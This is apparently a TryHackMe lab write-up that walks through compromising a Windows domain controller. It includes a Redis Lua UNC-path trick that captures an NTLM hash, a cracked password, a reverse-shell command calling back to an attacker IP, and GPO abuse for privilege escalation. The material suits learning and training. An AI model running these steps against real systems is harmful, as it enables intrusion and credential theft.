#tryhackme #activedirectory #medium ![[Pasted image 20250725225727.png]] # Information Gathering - Nmap TCP scan against all ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpall Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 08:16 UTC Nmap scan report for 10.10.132.71 Host is up (0.18s latency). Not shown: 65522 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 464/tcp open kpasswd5 6379/tcp open redis 9389/tcp open adws 49666/tcp open unknown 49667/tcp open unknown 49671/tcp open unknown 49672/tcp open unknown 49677/tcp open unknown 49705/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 44.00 seconds ``` One more TCP scan against the open ports found ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 53,135,139,445,464,6379,9389,49666,49667,49671,49672,49677,49705 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 08:19 UTC Nmap scan report for 10.10.132.71 Host is up (0.19s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 6379/tcp open redis Redis key-value store 2.8.2402 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49672/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 49705/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -6h38m38s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-07-25T01:41:27 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.86 seconds ``` UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 08:22 UTC Nmap scan report for 10.10.132.71 Host is up (0.18s latency). PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 123/udp open ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds ``` # Enumeration ##### Port 139 445 - SMB `smbclient` and `netexec` both confirmed `null authentication` or as guest is not allowed. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N -L //$IP Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.132.71 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ![[Pasted image 20250724204854.png]] ##### Port 6379 - Redis Tried enumerating anything on SMB but failed. Since we saw Redis is running on port 6379, let's see if it has some juicy information. I was able to connect to Redis using `redis-cli` `info` command returned some information about the server. ```bash ──(kali㉿kali)-[~/Desktop] └─$ redis-cli -h $IP 10.10.132.71:6379> info # Server redis_version:2.8.2402 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:b2a45a9622ff23b7 redis_mode:standalone os:Windows arch_bits:64 multiplexing_api:winsock_IOCP process_id:2328 run_id:62eb0edeeb2e811bd97f91f173b736b2f4fadb12 tcp_port:6379 uptime_in_seconds:3350 uptime_in_days:0 hz:10 lru_clock:8580171 config_file: ... <SNIP> ``` `config get *` command lists all the configuration data of the running Redis server and the value of `dir` gives us a hint about the user: `enterprise-security`. ![[Pasted image 20250724214833.png]] Redis document says Redis lets users upload and execute `Lua` scripts on the server. ![[Pasted image 20250724220331.png]] I'm going to take advantage of this and intercept NTLM hash using `responder`. ![[Pasted image 20250724220913.png]] Let me briefly explain how this is possible. 1. `Lua` runs the command `dofile("//attacker-IP/wook413")` to open the file. 2. The Windows Operating system sees the `//` path and recognizes it as a UNC path, which means a network share. 3. Windows OS automatically tries to connect to the attacker's IP using the SMB protocol to access the file. 4. During this connection, Windows sends an NTLM authentication request. 5. The attacker (in this case me, wook) listens and captures the NTLM hash sent by Windows using `responder` Let's crack the hash using `hashcat`. Password is `sand_0873959498` ![[Pasted image 20250724230458.png]] Enumerated users and shares in the domain using `nxc` with the `enterprise-security` credentials ![[Pasted image 20250724231154.png]] We have 6 shares. I learned that `ADMIN
, `C
, and `IPC
shares are standard shares in SMB and `NETLOGON` and `SYSVOL` shares are standard in DC. That makes `Enterprise-Share` stand out also we have `READ` and `WRITE` permissions. ![[Pasted image 20250724231726.png]] There's a single file named `PurgeIrrelevantData_1826.ps1` which I am going to download ![[Pasted image 20250724232041.png]] The code inside the file appears to be deleting everything under the `C:\Users\Public\Documents\` folder. I suspect this file might be a scheduled task? ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat PurgeIrrelevantData_1826.ps1 rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue ``` Because we have a `WRITE` permission on the share, we can write a reverse shell, overwrite the file and see if it's executed. I used `nishang`'s `Invoke-PowerShellTcp.ps1` reverse shell and added the following line at the very end: `Invoke-PowerShellTcp -Reverse -IPAddress 10.13.89.243 -Port 1234` so it can be invoked. I overwrote the file and after a second or two, I captured the shell! ![[Pasted image 20250724235628.png]] Found `user.txt` ![[Pasted image 20250724235820.png]] # Privilege Escalation `whoami /priv` reveals that current user has `SeImpersonatePrivilege` enabled. ![[Pasted image 20250725210841.png]] So I looked up services and I found `Print Spooler` service is running. In this case, we have a high chance that we can leverage this with `PrintSpoofer.exe` tool for privilege escalation. ![[Pasted image 20250725211301.png]] Even though the service was running, successfully transferred `PrintSpoofer.exe` file, I couldn't get a shell. ![[Pasted image 20250725212332.png]] ##### Bloodhound I transferred `SharpHound.exe` to remote Windows system to collect data before firing up Bloodhound CE. Usually, I use `bloodhound-python` as my go-to collector because I do not like transferring files repeatedly, but for some reason `bloodhound-python` was not working properly. So I had to use SharpHound.exe instead. ![[Pasted image 20250725220901.png]] After collecting data, I moved the file back to my kali. ![[Pasted image 20250725220915.png]] Uploaded the `.zip` file to Bloodhound to map out the AD. ![[Pasted image 20250725221027.png]] I found our current user, `enterprise-security` has `GenericWrite` privileges over `SECURITY-POL-VN` node which grants privileges across the system. To exploit this GPO, I am going to utilize `SharpGPOAbuse`. ![[Pasted image 20250725224022.png]] First I had to transfer `SharpGPOAbuse.exe` file over to remote Windows system from my kali. ![[Pasted image 20250725225101.png]] Then I ran the following command: `.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount enterprise-security --GPOName 'SECURITY-POL-VN'` ![[Pasted image 20250725225246.png]] Then I ran `gpupdate /force` to apply the new group policy update. ![[Pasted image 20250725225345.png]] Since we should have a local admin access now, I'm going to use `psexec` to spawn the shell. As you can see from the screenshot below, I successfully logged in as `SYSTEM` user. ![[Pasted image 20250725225526.png]] Found `system.txt` ![[Pasted image 20250725225650.png]]